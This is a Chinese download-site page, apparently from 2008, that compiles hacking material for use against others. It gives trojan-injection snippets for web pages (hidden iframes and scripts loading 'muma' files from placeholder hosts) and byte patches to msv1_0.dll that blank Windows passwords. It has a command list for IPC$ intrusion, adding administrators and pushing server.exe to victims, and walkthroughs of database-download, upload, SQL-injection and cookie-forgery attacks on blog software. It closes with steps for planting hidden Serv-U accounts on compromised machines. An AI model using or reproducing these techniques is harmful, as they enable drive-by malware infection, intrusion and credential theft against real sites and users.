<
您还没有登录┊登录注册 当前在线:559
源码程序系统工具编程开发图形图像网络软件应用软件多媒体类娱乐休闲驱动程序各类教程各类论文文章阅读
ASPPHPJSPASP.NETVBVF百度搜索星星练题网络文摘股市消息技能习题详细分类
当前位置:首页 \ 源码程序 \ 其它
站内搜索


如何在网页挂马

文件大小:10 K
运行平台:Windows9X/ME/NT/2000/XP
级别评定:
添加时间:2008-7-18 9:37:18
最后更新:2008-7-18 9:37:18
相关链接:无
所需金额:0 元
添加者:管理员

Download.1

/ ::软件简介:: / ::相关软件:: / ::软件点评:: /::上一个::/ ::下一个:: /
管理首页
网页挂马代码大全(各种各样的挂马)

一:框架挂马

   <iframe src=地址 width=0 height=0></iframe> 

二:js文件挂马
   
   首先将以下代码
   document.write("<iframe width='0' height='0' src='地址'></iframe>");
   保存为xxx.js,
   则JS挂马代码为
   <script language=javascript src=xxx.js></script> 

三:js变形加密
   
   <SCRIPT language="JScript.Encode"  src=http://www.xxx.com/muma.txt></script> 
   muma.txt可改成任意后缀

四:body挂马

   <body onload="window.location='地址';"></body>

五:隐蔽挂马

   top.document.body.innerHTML = top.document.body.innerHTML +    '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

六:css中挂马

   body { 
   background-image: url('javascript:document.write("<script          src=http://www.XXX.net/muma.js></script>")')} 

七:JAJA挂马

  <SCRIPT language=javascript>      
  window.open  ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro  llbars=no,width=1,height=1");  
  </script>

八:图片伪装

  <html>
  <iframe src="网马地址" height=0 width=0></iframe>
  <img src="图片地址"></center>
  </html>

九:伪装调用:

   <frameset rows="444,0" cols="*">
   <frame src="打开网页" framborder="no" scrolling="auto" noresize    marginwidth="0"margingheight="0">
   <frame src="网马地址" frameborder="no" scrolling="no"   noresize    marginwidth="0"margingheight="0">
   </frameset>

十:高级欺骗

   <a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

清空Windows系列系统帐户密码主要利用的是修改Dll文件的方法。用途不用明说了吧。
windows和system32下各有一个msv1_0.dll 编辑它即可。
Windows xp sp2
F8 10 75 11 B0 01 8B 4D
修改为
E0 00 75 11 B0 01 8B 4D
Windows 2000 pro
F8 10 0F 84 71 FF FF
修改为
E0 00 0F 84 71 FF FF
Windows 2000 sp4
F8 10 75  11 B0 01 8B 4D
修改为
E0 00 75 11 B0 01 8B 4D
Windows 2003 sp1
F8 10 0F 84 D0 B8 FF FF
修改为
E0 00 0F 84 D0 B8 FF FF
Windows Vista rtm
F8 10 75 13 B0 01 8B 4D
修改为
E0 00 75 13 B0 01 8B 4D 
注意是清空密码,修改密码的话,我想使用NET USER 命令足矣

OS命令字典net use \\ip\ipc$ " " /user:" " 建立IPC空链接 
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: 
net use h: \\ip\c$ 登陆后映射对方C:到本地为H: 
net use \\ip\ipc$ /del 删除IPC链接 
net use h: /del 删除映射对方到本地的为H:的映射 
net user 用户名 密码 /add 建立用户 
net user guest /active:yes 激活guest用户 
net user 查看有哪些用户 
net user 帐户名 查看帐户的属性 
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 
net start 查看开启了哪些服务 
net start 服务名  开启服务;(如:net start telnet, net start schedule) 
net stop 服务名 停止某服务 
net time \\目标ip 查看对方时间 
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 
net view 查看本地局域网内开启了哪些共享 
net view \\ip 查看对方局域网内开启了哪些共享 
net config 显示系统网络设置 
net logoff 断开连接的共享 
net pause 服务名 暂停某服务 
net send ip "文本信息" 向对方发信息 
net ver 局域网内正在使用的网络连接类型和信息 
net share 查看本地开启的共享 
net share ipc$ 开启ipc$共享 
net share ipc$ /del 删除ipc$共享 
net share c$ /del 删除C:共享 
net user guest 12345 用guest用户登陆后用将密码改为12345 
net password 密码 更改系统登陆密码 
netstat -a 查看开启了哪些端口,常用netstat -an 
netstat -n 查看端口的网络连接情况,常用netstat -an 
netstat -v 查看正在进行的工作 
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) 
netstat -s 查看正在使用的所有协议使用情况 
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。 
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) 
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息 
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) 
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) 
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
#2 二:
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同) 
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令 
at id号 开启已注册的某个计划任务 
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止 
at id号 /delete 停止某个已注册的计划任务 
at 查看所有的计划任务 
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 
finger username @host 查看最近有哪些用户登陆 
telnet ip 端口 远和登陆服务器,默认端口为23 
open ip 连接到IP(属telnet登陆后的命令) 
telnet 在本机上直接键入telnet 将进入本机的telnet 
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 
copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下 
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件 
copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C: 
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送 
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机 
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时) 
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface 
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令 
mem 查看cpu使用情况 
attrib 文件名(目录名) 查看某文件(目录)的属性 
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性 
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间 
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间 
set 指定环境变量名称=要指派给变量的字符 设置环境变量 
set 显示当前所有的环境变量 
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 
pause 暂停批处理程序,并显示出:请按任意键继续.... 
if 在批处理程序中执行条件处理(更多说明见if命令及变量) 
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签) 
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?) 
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量) 
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置 
echo 信息 在屏幕上显示出信息 
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中 
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello 
find 文件名 查找某文件 
title 标题名字 更改CMD窗口标题名字 
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
#3 三:
ver 在DOS窗口下显示版本信息 
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名) 
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS 
md 目录名 创建目录 
replace 源文件 要替换文件的目录 替换文件 
ren 原文件名 新文件名 重命名文件名 
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称 
type 文件名 显示文本文件的内容 
more 文件名 逐屏显示输出文件 
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir= 
taskmgr 调出任务管理器 
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误 
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口 
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe 
path 路径\可执行文件的文件名 为可执行文件设置一个路径。 
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /? 
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示; 
regedit /e 注册表文件名 导出注册表 
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 
cacls 文件名 查看文件的访问用户权限列表 
REM 文本内容 在批处理文件中添加注解 
netsh 查看或更改本地网络配置情况
#4 四:
IIS服务命令: 
iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现) 
iisreset /start或stop 启动(停止)所有Internet服务 
iisreset /restart 停止然后重新启动所有Internet服务 
iisreset /status 显示所有Internet服务状态 
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动 
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机 
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务 
iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。 
FTP 命令: (后面有详细说明内容) 
ftp的命令行格式为:
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
-d 使用调试方式。 
-n 限制ftp的自动登录,即不使用.netrc文件。
-g 取消全局文件名。 
help [命令] 或 ?[命令] 查看命令说明 
bye 或 quit 终止主机FTP进程,并退出FTP管理方式. 
pwd 列出当前远端主机目录 
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 
mget [remote-files] 从远端主机接收一批文件至本地主机 
mput local-files 将本地主机中一批文件传送至远端主机 
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 
ascii 设定以ASCII方式传送文件(缺省值) 
bin 或 image 设定以二进制方式传送文件 
bell 每完成一次文件传送,报警提示 
cdup 返回上一级目录 
close 中断与远程服务器的ftp会话(与open对应) 
open host[port] 建立指定ftp服务器连接,可指定连接端口 
delete 删除远端主机中的文件 
mdelete [remote-files] 删除一批文件 
mkdir directory-name 在远端主机中建立目录 
rename [from] [to] 改变远端主机中的文件名 
rmdir directory-name 删除远端主机中的目录 
status 显示当前FTP的状态 
system 显示远端主机系统类型 
user user-name [password] [account] 重新以别的用户名登录远端主机 
open host [port] 重新建立一个新的连接 
prompt 交互提示模式 
macdef 定义宏命令 
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 
chmod 改变远端主机的文件权限 
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 
cd remote-dir 进入远程主机目录 
cdup 进入远程主机目录的父目录 
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
#5 五:
MYSQL 命令: 
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。
(例:mysql -h110.110.110.110 -Uroot -P123456 
注:u与root可以不用加空格,其它也一样) 
exit 退出MYSQL 
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码 
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符) 
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。 
use mysql;
show tables; 显示库中的数据表 
describe 表名; 显示数据表的结构 
create database 库名; 建库 
use 库名;
create table 表名 (字段设定列表); 建表 
drop database 库名; 
drop table 表名; 删库和删表 
delete from 表名; 将表中记录清空 
select * from 表名; 显示表中的记录 
mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。 
win2003系统下新增命令(实用部份): 
shutdown /参数 关闭或重启本地或远程主机。
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
例:shutdown /r /t 0 立即重启本地主机(无延时) 
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。 
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
#6 六:
Linux系统下基本命令: 要区分大小写 
uname 显示版本信息(同win2K的 ver) 
dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir) 
pwd 查询当前所在的目录位置 
cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。 
cat 文件名 查看文件内容 
cat >abc.txt 往abc.txt文件中写上内容。 
more 文件名 以一页一页的方式显示一个文本文件。 
cp 复制文件 
mv 移动文件 
rm 文件名 删除文件,rm -a 目录名删除目录及子目录 
mkdir 目录名 建立目录 
rmdir 删除子目录,目录内没有文档。 
chmod 设定档案或目录的存取权限 
grep 在档案中查找字符串 
diff 档案文件比较 
find 档案搜寻 
date 现在的日期、时间 
who 查询目前和你使用同一台机器的人以及Login时间地点 
w 查询目前上机者的详细资料 
whoami 查看自己的帐号名称 
groups 查看某人的Group 
passwd 更改密码 
history 查看自己下过的命令 
ps 显示进程状态 
kill 停止某进程 
gcc 黑客通常用它来编译C语言写的文件 
su 权限转换为指定使用者 
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。 
ftp ftp连接上某服务器(同win2K)

变形加密这是最后一次写客户端的加密了,这样没有意义,正如neeao说的一样,一切客户端加密都是纸老虎
原来不知道可以这样
XML/HTML代码
<script>     
t="20 + 29,100 -50 ,2142 / 42"       t=eval("String.fromCharCode("+t+")");        document.write(t);</script>   写了一个在线加密的,随机用+-/来运算

鸟的入侵 博客入侵太简单了漏洞一:数据库下载漏洞   第一步,搜索攻击目标 
  打开搜索引擎,搜索“Pragram by Dlog”,可以找到许多博客页面,这些博客都是使用“Dlog破废墟修改版”建立的。我们要找的叶面是存在暴库漏洞的1.2版本。许多用户都忽视了这个版本中内嵌的eWebEditor在线编辑数据库的安全性,致使黑客可以使用默认的路径进行下载。 
  第二步,获取管理员密码 
  在搜索结果列表中挑一个攻击目标:http://s*.8888.com/blog/,用浏览器打开这个地址,在后面加上eWebEditor/db/e/eWebEditor.mdb并回车,下载数据库。 
  打开这个数据库,在数据库的“eWebEditor_system”列中可以看到管理员的用户名和密码。由于密码都是经过MD5加密的,因此找一个MD5密码暴力破解器计算机分钟或几天,就可得到密码。不过据经验,只要能下载这个数据库,就说明管理员极有可能没有更改默认的登陆密码,如果看到MD5密码为“7a57a5a743894a0e”,那么密码就是默认的“admin”。现在,我们可以进入eWebEditor后台在线编辑页面了。 
  第三步,控制服务器 
  在博客的地址后加上“eWebEditor/admin_login.asp”即可打开eWebEditor后台在线编辑页面。输入默认的用户名和密码“admin”即可顺利登陆博客的后台管理页面。 
  新添加一个博客样式,返回样式管理页面。在样式列表中找到刚才添加的样式,并点击样式名后的“设置”按钮,就可使用新的博客样式。 
  退出管理页面后进行注册并登陆博客,然后发一篇帖子并选择上传文件,此时我们可以上传ASP木马以便控制整个服务器。 
  漏洞二:文件上传漏洞 
  第一步,搜索存在漏洞的博客 
  找到任意一个目标后,首先要测试博客管理员是否将上传网页程序文件删除了,如果用户有一些安全意识,有可能会将默认的上传网页文件删除掉,这时就不行了。 
  我们选“http://www.88888.net/workingbird” ,在地址后添加“/upfile.asp”后回车,如果看到的提示信息为“Microsoft VBScript运行时错误 错误‘800a01b6’”之类的信息,表示该博客网站存在着文件上传漏洞。 
  第二步,展开攻击 
  运行“网站上传利用工具”,在“提交地址”中输入upfile.asp上传文件的所在地址,然后在“上传路径”中指定上传木马文件后的保存路径,我们一般将它保存在网站根目录下。“路径字段”和“文件字段”使用默认的设置就可以了,在“允许类型”中输入博客系统允许上传的图片类型。在“本地文件”后点击“浏览”选择本地的一个ASP木马,可以选择海洋顶端网木马。 
  现在点击“提交”按钮,即可上传木马,如果看到信息“1 file had been uploaded!”,则表示文件上传成功。接下来,我们就可以连接上传后的ASP木马进一步渗透攻击,达到控制整个网站服务器的目的。 
漏洞三:SQL注入漏洞 
  第一步,扫描博客中的注入漏洞 
  以博客“http://202.112.*.***/dlog/”作为目标。可以使用工具(如NBSI 2 SQL自动注入攻击器)进行SQL注入。运行程序,点击工具栏中的“网站扫描”,在“网站地址”中输入博客网址,勾选“全面扫描”项,点击“扫描”后,就可以对博客网站中存在的所有注入漏洞进行扫描。 
  第二步,开始攻击 
  在扫描结果列表中任意选一个目标“http://202.112.*.***/dlog/showlog.asp?log_id=402”,然后点击界面下方的“注入分析”进入“注入攻击”页面。点击“检测”按钮,结果显示“赞为监测到注入漏洞”! 
  不要紧,我们用1=1检测法。在注入浏览器地址栏中的末尾分别加上“and 1=1”和“and 2=2”,查看两者返回页面的信息中有什么不同。并记下在“and 1=1”页面中出现过,但是在“and 2=2”中未出现过的字符串,并将其输入NBSI 2界面的“特征字符串”。 
  现在点击“再检测”,很快就可看到注入检测的结果。由于数据库是Access数据库,所以程序会自动猜解数据库中的表名和列名,点击窗口中的“自动猜解”,即可猜测可能存在的数据库表名,默认的表名为“user_mdb”。再利用自动猜解得到表中的列名等数据信息。然后自动猜解表中的用户数据,从而得到管理员的MD5加秘密码。最后使用MD5密码破解工具暴力破解,登陆后台管理页面,成功入侵。 
  漏洞四:cookies欺骗漏洞 
  第一步,搜索目标 
  搜索关键词“Powered by L-Blog”,选择“http://***.*****.***/blog”作为攻击目标。 
  第二步,查询cookies信息 
  这里要用到一款可以修改cookies信息的工具。打开程序,输入博客网站的地址并登陆,查看当前的cookies信息,其中包含了我们的登陆用户名和密码等信息。 
  第三步,“欺骗”攻击 
  现在要对cookies信息进行修改,欺骗博客程序,使它以为登陆用户的身份是管理员。此时可直接对cookies信息进行修改。 
  我们只修改“menStatus=SupAdmin”,其它内容保留,然后继续保持工具栏中的“锁”为按下状态。现在,退出当前的用户登陆状态,重新打开该博客首页。此时会显示我们没有登陆,然而我们已经拥有了管理员的权限。 
  后记:博客是一个联系入侵供给的好战场,也提醒博客应加强安全意识。 
UID107 帖子5 精华0 积分5 阅读权限10 在线时间0 小时 注册时间2007-12-8 最后登录2008-1-3 查看详细资料
 TOP 
 
何利用肉鸡上的Serv-U Ftp服务器如何利用肉鸡上的Serv-U Ftp服务器
之一:添加一个用户
很多肉鸡安装了serv-U服务器,我们可以把它利用起来,下面的方法是可以通过telnet或者nc命令行直接修改serv-U的参数而利用之。
在serv-U的目录下有一个servudaemon.ini,关键是修改servudaemon.ini,第一步,当然是要先把对方的servudaemon.ini下载回来,在本机把它修改好。至于怎么把这个文件取回来不是这里讨论的问题,方法很多。
下面请看一个servdaemon.ini的范例,<>中是我写的说明文字,不是文件中的文字。
[GLOBAL] <定义一些全局参数> 
Version=4.0.0.4 
Registrati+cDAgAIUm9nZXJMZWUSbGls 
aW5nanVuQHNpbmEuY29tB0VDTGlQU0UA 
ProcessID=1748 
[DOMAINS] <在这里定义域名及IP,端口号> 
Domain1=0.0.0.0||21|Wizard Generated Domain|1|0 
[Domain1] <用户名的定义> 
User1=Anonymous|1|0 <第一个用户是anonymous,即匿名用户,允许匿名用户访问> 
User2=1|1|0 <第二个用户是1> 
User3=2|1|0 <第三个用户是2> 
[USER=Anonymous|1] <用户"anonymous"的定义> 
HomeDir=d:\wutemp <用户anonymous的根目录> 
RelPaths=1 <锁定在根目录,如果不锁定在根目录可以把该行删除> 
TimeOut=600 
Note1="Wizard generated account" 
Access1=D:\WUTemp|RLP <用户anonymous权限设置在此处,R表示读文件,L表示目录列表,最后一个P必须有> 
[USER=2|1] <用户"2"的定义> 
Password=cuA40FB53D1C89D1E7153EF826B6B38DC3 <用户密码设定,我不知道怎么破这个密码,如果不设密码可以把该行删除> 
HomeDir=D:\temp 
RelPaths=1 
TimeOut=600 
Access1=D:\temp|RLP <用户"2"可以读取d:\temp目录下的文件,所以可以下载文件> 
[USER=1|1] <用户"1"的定义> 
Password=hv12154DF65AC601DDA5D39C2F7B2E0F4C 
HomeDir=d:\temp 
RelPaths=1 
TimeOut=600 
Access1=D:\temp|RWLP <用户"1"对d:\temp有列目录的权利,可以读写该目录下的文件> 
权限设定具体说明: 
RL 只能读文件,下载文件 
RWL 可以写文件,所以可以上载文件 
RWML M是可以删除的权限 
RWAMEL A是添加权限,E是执行权限 
RWLCD C是目录创建权限,D是目录删除权限 
OK,所以首先是把对方的servudaemon.ini下载到本地的机器上,根据自己的需要把这个文件修改好,然后再传上去覆盖原文件。
修改的步骤是在[DOMAIN1]中先添加用户名称,如上例中已经有三个用户anonymous、1、2,再添加一个用户3,密码为空,在d:\temp目录下可以读写文件、创建删除目录,不锁定在本目录,同时对C:\有访问权限。
先在[Domain1]下增加一个用户,如下: 
user4=3|1|0 
然后再增加一个段,说明用户"3"的权限 
[user3|1] 
HomeDir=d:\temp 
TimeOut=600 
Access1=D:\temp|RWLCDP 
Access2=C:\|RLP 
之二:添加一个隐蔽的帐号 
在 Serv-U 中建立隐藏用户(本地通过,未经肉鸡测试~~希望大家完善本文) 
在如今的 FTP 服务段软件中,Serv-U 以其简单易用性成为广大管理员的首选,当我 
们控制一台肉鸡后,如果它采用 Serv-U 管理 FTP ,我们该如何建立一个隐藏的 FTP 账 
户来下载他的东东呢? 
我们可以采用 Serv-U Assistant 这个软件,可以到作者网页 http://www.katkat.com/ 或 
者在华军下载(目前版本为1.01) 
这个软件主要用于扩充 Serv-U 的帐号管理, 它采用Serv-U扩展库,实现的原理为"帐 
号-映射",建立一个或多个帐号"映射",当在 Serv-U 中设置好一个固定帐号(即Serv-U 
的帐号)后,"映射帐号"就继承了这个固定帐号的所有权限设置,每个"映射帐号" 有各 
自的登录密码。 
下载压缩文件 AssServU.zip,解压后得到以下文件: 
AssServU.dll -------- 扩充功能库 
AssServU.exe -------- 管理主程序 
AssServU.ini -------- 配置文件 
AssServU.mdb -------- 数据库文件 
AssReadme.mht ------- 自述文件 
我们的目的是为了隐藏我们 FTP 账号,因此第一步我们要获取肉鸡上的一个 Serv-U 
的账户名(仅账户名而已):3389图形界面可以通过 ServUAdmin.exe 获得;命令行下可以 
通过 ServUDaemon.ini 获得,当然最好获得权限比较大的用户名(因为我们的隐藏账号的 
权限与他的相同) 
第二步:在自己的机器上做好配置:首先为了隐藏的需要,我们将assServU.mdb复制 
一份为ServU.dat ,将assServU.dll改名为ServU.dll ; 
双击 assServU.exe ,在 Settting 选项卡下的 Log options 中去掉 Log system 
messages 、 Log error messages 、 Log file dosnloads 、 Log file uploads 前面的勾(这是 
为了系统不记录日志);在 Account Datasource 中选 Custom ,在 Connection string 点 
Set ,在"连接"选项卡中的"1。选择或输入数据库名称"中将 AssServU.mdb 改为 
Servu.dat ,然后点"确定",在退回 Setting 选项卡后点 Save 。 
在 Account 选项卡下添加用户, Username 为你想添加的用户,如:hacker, Password 
为你的密码,如:123, Serv-U account 为第一步中你选择的权限较大的用户,如:admin, 
然后点 Save 按钮。 
好了,配置完成。
第三步:上传我们的 ServU.dat 和 ServU.dll ,修改肉鸡的 ServUDaemon.ini 文件,添加 
以下字段: 
[EXTERNAL] 
ClientCheckDLL1=ServU.dll 
然后重起Serv-U 服务 
这样你就可以用隐藏账号登陆了,此时登陆账号还是第一步你选择的账号,但密码格式 
为"你的用户名=密码",如果你像第二步那样设置的话,登陆名就为admin,密码为hacker=111 
hehe,这样管理员在管理界面什么都看不出来 
OK,game over! 
UID107 帖子5 精华0 积分5 阅读权限10 在线时间0 小时 注册时间2007-12-8 最后登录2008-1-3 查看详细资料
 TOP 
 

相关软件
·圣马客企业建站CMS系统v5.7
·圣马客企业建站CMS系统v5.6
·圣马客企业建站CMS系统v5.4
·圣马客企业建站CMS系统v5.5
·圣马客企业建站CMS系统v5.3
·圣马客企业建站CMS系统v5.1
·马克斯CMS(maxcms)v4.0beta
·ASP木马扫描器2010
·ASP木马扫描器v2010
·PhpCms 木马扫描器


1分 0
2分 0
3分 0
4分 0
5分 0
共有 0 人打分
平均得分:0


按字符查询:ABCDEFGHIJKLMNOPQRSTUVWXYZ0~9中文
下载图示: - 附汉化补丁 - 附注册 - 会员软件 - 推荐 - 最新添加
Rainight, 星旺坡 联网备案号:41092802000212 豫ICP备19032584号-1 页面执行时间: 0.13秒
业务QQ:80571569 手机:13030322310